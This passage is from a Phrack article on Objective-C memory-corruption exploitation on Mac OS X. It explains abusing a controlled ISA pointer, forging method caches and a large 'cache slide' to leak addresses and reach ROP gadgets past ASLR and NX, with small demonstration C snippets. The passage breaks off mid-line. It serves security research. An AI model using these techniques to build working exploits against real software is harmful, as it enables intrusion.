[ News ] [ Paper Feed ] [ Issues ] [ Authors ] [ Archives ] [ Contact ]


..[ Phrack Magazine ]..
.:: Modern Objective-C Exploitation Techniques ::.

Issues: [ 1 ] [ 2 ] [ 3 ] [ 4 ] [ 5 ] [ 6 ] [ 7 ] [ 8 ] [ 9 ] [ 10 ] [ 11 ] [ 12 ] [ 13 ] [ 14 ] [ 15 ] [ 16 ] [ 17 ] [ 18 ] [ 19 ] [ 20 ] [ 21 ] [ 22 ] [ 23 ] [ 24 ] [ 25 ] [ 26 ] [ 27 ] [ 28 ] [ 29 ] [ 30 ] [ 31 ] [ 32 ] [ 33 ] [ 34 ] [ 35 ] [ 36 ] [ 37 ] [ 38 ] [ 39 ] [ 40 ] [ 41 ] [ 42 ] [ 43 ] [ 44 ] [ 45 ] [ 46 ] [ 47 ] [ 48 ] [ 49 ] [ 50 ] [ 51 ] [ 52 ] [ 53 ] [ 54 ] [ 55 ] [ 56 ] [ 57 ] [ 58 ] [ 59 ] [ 60 ] [ 61 ] [ 62 ] [ 63 ] [ 64 ] [ 65 ] [ 66 ] [ 67 ] [ 68 ] [ 69 ]
Current issue : #69 | Release date : 2016-05-06 | Editor : The Phrack Staff
IntroductionThe Phrack Staff
Phrack Prophile on Solar DesignerThe Phrack Staff
Phrack World NewsThe Phrack Staff
Linenoisevarious
LoopbackThe Phrack Staff
The Fall of Hacker GroupsStrauss
Revisiting Mac OS X Kernel RootkitsfG!
Adobe Shockwave - A case study on memory disclosureaaron portnoy
Modern Objective-C Exploitation Techniquesnemo
Self-patching Microsoft XML with misalignments and factorialsAlisa Esage
Internet Voting: A Requiem for the Dreamkerrnel
Attacking Ruby on Rails Applicationsjoernchen
Obituary for an Adobe Flash Player bughuku
OR'LYEH? The Shadow over Firefoxargp
How to hide a hook: A hypervisor for rootkitsuty & saman
International scenesvarious
Title : Modern Objective-C Exploitation Techniques
Author : nemo
                              ==Phrack Inc.==

                Volume 0x0f, Issue 0x45, Phile #0x09 of 0x10

|=-----------------------------------------------------------------------=|
|=-----------=[ Modern Objective-C Exploitation Techniques ]=------------=|
|=-----------------------------------------------------------------------=|
|=----------------------------=[ by nemo ]=------------------------------=|
|=-----------------------=[ nemo@felinemenace.org ]=---------------------=|
|=-----------------------------------------------------------------------=|

--[ Introduction

Hello again reader. Over the years the exploitation process has obviously
shifted in complexity. What once began with the straight forward case of
turning a single bug into a reliable exploit has now evolved more towards
combining vulnerability primitives together in an attempt to bypass each
of the memory protection hurdles present on a modern day operating system.

With this in mind, let's jump once again into the exploitation of
Objective-C based memory corruption vulnerabilities in a modern time.
Back in Phrack 0x42 (Phile #0x04) I wrote a paper documenting a way to turn
the most common Objective-C memory corruption primitive (an attacker
controlled Objective-C method call) into control of EIP. If you have not
read this paper, or if it's been a while and you need to refresh, it's
probably wise to do so now, as the first half of this paper will only build
on the techniques covered in the original [1]. Contrary to the beliefs of
Ian Beer, the techniques in the original paper are still alive and kicking
in modern times however some adjustment is needed depending on the context
of the vulnerability.

--[ Dangling Objective-C Method Calls

As you're aware since you read my paper in [1], Objective-C method calls
are implemented by passing "messages" to the receiver (object) via the
objc_msgSend() API call.
When Objective-C objects are allocated, storage for their instance
variables is allocated on the native heap with malloc(). The first element
in this space is a pointer to the class definition in the binary. This is
typically referred to as the "ISA" pointer. As in: "an NSString 'IS-A'
NSObject".

When dealing with bugs in Objective-C applications it is extremely common
for this ISA pointer to be attacker controlled, resulting in an Objective-C
method call to be performed on an attacker controlled memory location.
This can occur when dealing with Use-After-Free conditions, heap overflows
into objective-c objects, and even format bugs using the %@ format string
character.

In my original paper [1] I wrote about how to utilize this construct to
perform a successful cache lookup for the selector value, resulting in
control of EIP. An alternative route to gain EIP control is to make the
Objective-C runtime think that it's finished looking through the entire
cache and found no match for the SEL value passed in. In which case the
runtime will attempt to resolve the method's address via the class
definition (through the controlled ISA pointer) and once again use an EIP
value from memory controlled by us. This method is longer however, and adds
little benefit. But i digress, both of these methods are still completely
valid in the most current version of Mac OS X at this time Mavericks,
(10.10).

While, at the time of the Phrack 0x42 release, this technique was fairly
useful by itself, in modern times EIP/RIP control is only a small victory
and in no way wins the battle of process control. This is due to the fact
that even with direct control of EIP modern NX and ASLR makes it difficult
to know a reliable absolute location in which we can store a payload and
return to execute it.

From what i've seen, the most commonly used technique to bypass this
currently is to combine an EIP control primitive with an information leak
of a .text address in order to construct a ROP chain (returning repeatedly
into the text segment) which either executes the needed functionality,
mprotect()'s some shellcode before executing it, or loads an existing
executable or shared library.

Under the right conditions, it is possible to skip some of these steps
and turn a dangling Objective-C method call into both an information leak
and execution control.

In order to use this technique, we must first know the exact binary version
in use on the target. Thankfully on Mac OS X this is usually pretty easy as
automatic updates mean that most people are running the same binary
version.

The specifics of the technique differ depending on the architecture of the
target system, as well as the location of the particular SEL string which
is used in the dangling method call construct.

Since we are already familiar with 32-bit internals, we will begin our
investigation of dangling objc_msgSend() exploitation with the 32-bit
runtime, before moving on to look at the changes in the new run-time on
64-bit.

--[ 32-bit dangling objc_msgSend()

Firstly, 32-bit processes utilize the old Objective-C runtime, so the
specifics of the internals are identical to what is documented in my
original paper. However, depending on the location of the module
containing the selector string, the technique varies slightly.

----[ 32-bit Shared Region

The shared-region is a mapping which is common to all processes on the
system. The file '/var/db/dyld/dyld_shared_cache_i386' is mapped into this
space. This file is generated by the "update_dyld_shared_cache" utility
during system update, and contains a large selection of libraries which are
commonly used on the system. The .paths files in
"/var/db/dyld/shared_region_roots" dictate which files are contained
within. The order in which each library is added to this file is
randomized, therefore the offset into the file for a particular library
cannot be relied on. Reading the file
'/var/db/dyld/dyld_shared_cache_i386.map' shows the order of these files.

For 32-bit processes, this file is mapped at the fixed address 0x90000000.
At this location there is a structure which described the contents of the
shared region.

This technique, once again, revolves around the ability to control the ISA
pointer, and to point it at a fake class struct in memory. In order to
demonstrate how this works, a small sample Objective-C class was created
(shown below). The complete example of this technique is included at the
end of this paper in the uuencoded files blob.

        [leakme.m]

        #import "leakme.h"

        @implementation leakme
        -(void) log
        {
            printf("lol\n");
        }
        @end

In main.m, we create an instance of this object, and then use sprintf() to
write out a string representation of the objects address, before converting
it back with atol(). This is pretty confusing, but it's basically an easy
way to trick the compiler into giving us a void pointer to the object. Type
casting the object pointer directly will not compile with gcc.

        printf("[+] Class @ 0x%lx\n",l);
        sprintf(num,"%li",l);
        long *ptr = atol(num);
        ...
        printf("[+] Overwriting object\n");
        *ptr = &fc; // isa ptr

By overwriting the ISA pointer with the address of an allocation we
control, we can easily simulate a vulnerable scenario. Obviously in the
real world things are not that easy. We need to know the address of an
allocation which we control. There are a variety of ways this can be
accomplished. Some examples of these are:

- Using a leak to read a pointer out of memory.
- Abusing language weaknesses to infer an address. [2]
- Abuse the predictable nature of large allocations.

However, these concepts are the topic of many other discussions and not
relevant to this particular technique.

As a quick refresher, the first thing the Objective-C runtime does when
attempting to call a method for an object (objc_msgSend()) is to retrieve
the location of the method cache for the object. This is done by
offsetting the ISA pointer by 0x20 and reading the pointer at this
location. To control this cache pointer we use the following structure:

        struct fakecache {
            char pad[0x20];
            long cache_ptr;
        };

In the example code we use a separate allocation for the fakecache struct
and the cache itself. However in a real scenario the address of the cache
itself would most likely be the same address as the fakecache offset by
0x24. This would allow us to use a single allocation, and therefore a
single address, reducing the constraints of the exploit. Also, in a real
world case we could leak the address of the cache_ptr, then subtract 0x20
from it's address. This would allow us to shave 0x20 bytes off of the
buffer we need to control.

Next, objc_msgSend() traverses the cache looking for a cached method call
matching the desired implementation. This is done by iterating through a
series of pointers to cache entries. Each entry contains a SEL which
matches the cached method SEL in the .text segment of the Objective-C
binary. By comparing this SEL value with the SEL value passed to
objc_msgSend() the matching entry can be located and used. Rather than
iterating through every pointer to find the appropriate cache entry each
time however, a mask is applied to the selector pointer. The masked off
bits are then shifted and used as an index into the cache table entry
pointer array. Then after this index is used, each entry is inspected.
This means that multiple entries can have the same index, however it
greatly reduces the search time of the cache. Controlling the mask provides
us with the mechanism we need to create a leak.

Ok, so going back to the mask. In my original Objective-C paper, we set the
mask to 0. This forced the runtime to look directly past the mask
regardless of what value the SEL had. In this case however, we want to
abuse the mask in order to isolate the "randomized" unpredictable bits in
the selector pointer value (SEL).

Below, we can see a "real" SEL value from a 10.10 system, which is located
in the shared_region.

        (lldb) x/s $ecx
        0x90f3f86e: "length"

Since we know that the shared region begins at 0x90000000 we know that
first octet will always be 0x9. We also know that the offset into the page
which contains the SEL will always be the same, therefore the last 3
octets 0x86e will be the same for the binary version we retrieve the SEL
value from. However, we cannot count on the rest of the SEL value being the
same on the system we are running our exploit against.

For the value 0x90f3f86e we can see the bit pattern looks as follows:

          9   0    f    3    f     8    6   e
        1001 0000 1111 0011 1111 1000 0110 1110 : 0x90f3f86e

Based on what we just discussed the mask which would retrieve the bits we
care about looks as follows:

         0    f    f     f   f     0   0    0
        0000 1111 1111 1111 1111 0000 0000 0000 : 0x0ffff000

However, since objc_msgSend() shifts the SEL 2 to the right prior to
applying the mask, we must shift our mask to account for this.

This leaves us with:

         0    3    f    f    f    c    0    0
        0000 0011 1111 1111 1111 1100 0000 0000 : 0x03fffc00

As you remember, objc_msgSend() applies the following calculation to
generate the index into the cache entries:

        index = (SEL >> 2) & mask

Filling in the values for this leaves us with an index like:

        index = (0x90f3f86e >> 2) & 0x03fffc00 == 0x3cfc00

This means that for our particular SEL value the runtime will index
0x3cfc00 * 4 (0xf3f000) bytes forward, and take the bucket pointer from
this location. It will then dereference the pointer and check for a SEL
match at that location. By creating a giant cache slide, containing all
permutations of slide, we can make sure that this location contains the
right value for slide.

In the 32-bit runtime (the old runtime) the cache index is used to retrieve
a pointer to a cache_entry from an array of pointers. (buckets).
In our example code (main.m) we set the buckets array up as follows:

        long *buckets = malloc((CACHESIZE + 1) * sizeof(void *));

However, in a typical exploitation scenario, this array would be part of
the single large allocation which we control.

For each of the buckets pointers, a cache entry must be allocated. In the
example code we can use the following struct for each of these entries:

        struct cacheentry {
                long sel;
                long pad;
                long eip;
        };


Each of these structures must be populated with a different SEL and EIP
value depending on its index into the table. For each of the possible
index values, we add the (unshifted) randomized bits to the SEL base.
This way the appropriate SEL is guaranteed to match after the mask is
applied and used to index the table.

For the EIP value, we can utilize the fact that the string table containing
the SEL string is always going to be relative to the .text segment within
the same binary. The diagram below shows this more clearly.

        ,_______________,<--- Mach-O base address
        |               |
        | mach-o header |
        +---------------+
        |               |<--- SEL in string table, relative to base
        | string table  |    /\ Relative offset
        +---------------+    \/ from SEL to ROP gadgets
        |               |<--- ROP gadget in .text segment
        | .text segment |
        '---------------'

For each possible entry in the table, the EIP value must be set to the
appropriate address relative to the SEL value used. The quickest way i know
to calculate these values is to break on the objc_msgSend function and dump
the current SEL value. In lldb this is simple a case of using "reg read
ecx". Next, "target module list -a $ecx" provides us with the module base.
By subtracting the absolute SEL address from the module base we can get the
relative offset within the module. This can be repeated for the gadget
address within the same module. Next, when populating the table, we simple
need to add these two relative offsets to our potential module base
candidate. We increment the module base candidate for each entry in the
table.

By populating our cache slide in this way we are guaranteed the execution
of a single ROP gadget within the module that our SEL is in. This can be
enough for us to succeed. We will look into ways to use this construct
later.

Obviously the allocation used for this 32-bit technique is very large. To
calculate the size of the cache slide which we need to generate we need to
look at the size of the shared region. The shared region always starts at
0x90000000, but the first module inside the shared region starts at
0x90008000. The end of the shared region depends on the number of modules
loaded in the shared region. On the latest version of Mac OS X at this
time, the end of the shared region is located at 0x9c391000. The bit
patterns for these are shown below.

10010000 00000000 10000000 00000000 :: SR START -- 0x90008000
10011100 00111001 00010000 00000000 :: SR END   -- 0x9C391000

00001111 11111111 11110000 00000000 :: MASK UNSHIFTED

If we compare this to the unshifted mask, and mask off the bits we care
about we get the following values for our potential index values.

00000000 00000000 00100000 00000000  -- smallest index value - 0x2000
00000011 00001110 01000100 00000000  -- biggest  index value - 0x30E4400

Since the buckets array is an array of 4 byte pointer values we can
multiple the largest index by 4, giving us 0xc391000. Each cache entry
pointed to by a bucket is 12 bytes in size. This means that the size of the
cache entry array is 0x24ab3000.

By adding these two values together we get the total size of our cache
slide, 0x30e44000 bytes.

Allocations of this size can be difficult to make depending on the target
application. However, also due to the size, they are predictably placed
within the address space. This buffer can be made from JavaScript for
example.

----[ Uncommon 32-bit Libraries

Libraries which are not contained within the shared region are mapped in by
the linker when an executable is loaded that requires them as a dependency.

The location of these modules is always relative to the end of the
executable file and is loaded in the order specified in the LC_LOAD_DYLIB
header.

When loading the executable file, the kernel generates a randomized slide
value for ASLR. This value is added to the desired segment load addresses
in the executable (if it's compiled with PIE) and then the executable is
re-based to that location.

        uintptr_t requestedLoadAddress = segPreferredLoadAddress(i) +